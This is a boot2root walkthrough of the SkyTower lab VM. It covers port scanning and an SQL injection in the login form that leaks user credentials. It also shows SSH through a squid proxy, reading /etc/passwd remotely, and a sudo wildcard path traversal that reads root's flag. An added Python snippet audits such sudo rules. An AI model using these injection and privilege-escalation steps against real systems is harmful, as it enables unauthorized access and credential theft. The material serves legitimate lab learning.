Skytower 1 boot2root


Starting Nmap 6.46 ( ) at 2014-06-28 23:18 EEST  
Nmap scan report for  
Host is up (0.00075s latency).  
Not shown: 997 closed ports  
22/tcp   filtered ssh  
80/tcp   open     http  
3128/tcp open     squid-http  

Let's examine port 80:

SQL injection?

Let's try to find out:

Post request:



There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]  

Post data of the malicious request.



For security reasons, you must login to the SkyTech server via SSH to access the account details.

Username: john  
Email:[email protected]  
Password: hereisjohn  

The SSH port is filtered and squid is installed on the server. I added the following 2 lines to the ~/.ssh/config file:

  ProxyCommand corkscrew 3128 %h %p

So I am using corkscrew to get an SSH connection over squid.

Logging in:

ssh [email protected]


Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;  
the exact distribution terms for each program are described in the  
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent  
permitted by applicable law.  
Last login: Sat Jun 28 17:18:32 2014 from

Funds have been withdrawn  
Connection to closed.  

It logs in normally, but I don't have time to execute a command. Then I tried:

ssh [email protected] "cat /etc/passwd"

I found 2 more users in the passwd file:


Now that I know the email format of the company ([email protected]), I can try the other usernames in the first form.

Post request

[email protected]&password='*'  

Username: sara
Password: ihatethisjob

Post request

[email protected]&password='*'  

Username: william
Password: senseable

In order to get a shell, I should change the .bashrc file that closes the connection.

ssh [email protected] "mv /home/sara/.bashrc /home/sara/.bashrc_backup"  

After logging in, I typed sudo -l:

sudo -l  
Matching Defaults entries for sara on this host:  
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:  
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

The use of asterisks in the sudoers file is dangerous, as here: the * in the argument also matches ../, so the rule is not confined to /accounts/.

sudo ls /accounts/../root/  
sudo cat /accounts/../root/flag.txt  
Congratz, have a cold one to celebrate!  
root password is theskytower  
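
Why the `/accounts/*` rule fails to confine sara, as an added example (not part of the original write-up) that audits the `sudo -l` rule text shown above. It models sudo's argument matching with Python's `fnmatch`, which is a simplification; the function names and the sample path `/accounts/report.txt` are constructed for illustration.

```python
import fnmatch
import posixpath
import re

# Rule text as printed by `sudo -l` on this page.
SUDO_L_RULES = "(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*"

def parse_rules(text):
    """Split a `sudo -l` command list into (command, argument pattern) pairs."""
    rules = []
    for entry in text.split(","):
        # Drop the "(runas)" prefix and any "TAG:" markers such as NOPASSWD:
        spec = re.sub(r"^\s*\([^)]*\)\s*(?:[A-Z_]+:\s*)*", "", entry).strip()
        command, _, args = spec.partition(" ")
        rules.append((command, args))
    return rules

def sudo_allows(pattern, args):
    """Simplified model (assumption): the argument string is glob-matched as
    plain text, so '*' is not stopped by '/' and '..' is never resolved."""
    return fnmatch.fnmatchcase(args, pattern)

def escapes_prefix(pattern, args):
    """True if a single path argument matches the rule yet resolves outside
    the directory the rule was meant to expose (text before the first '*').
    Lexical check only: symlinks are not followed."""
    intended = posixpath.normpath(pattern.split("*", 1)[0])
    resolved = posixpath.normpath(args)
    inside = resolved == intended or resolved.startswith(intended + "/")
    return sudo_allows(pattern, args) and not inside

def audit(text):
    """Return the rules whose arguments contain a glob character."""
    return [(c, a) for c, a in parse_rules(text) if re.search(r"[*?\[]", a)]

if __name__ == "__main__":
    for cmd, pat in audit(SUDO_L_RULES):
        print(f"wildcard argument: {cmd} {pat}")
        # First path is a constructed sample; the second is the one used above.
        for candidate in ("/accounts/report.txt", "/accounts/../root/flag.txt"):
            print(f"  {candidate}: allowed={sudo_allows(pat, candidate)} "
                  f"escapes={escapes_prefix(pat, candidate)}")
```

Both rules are flagged. A safer design lists exact file paths in sudoers, or grants a wrapper script that canonicalizes its argument and rejects anything outside `/accounts`.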

And we are root! It was an entry-level boot2root, but it has some unique 'features' like the use of squid.

MySQL credentials as a bonus:

cat /var/www/login.php | grep mysql  
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');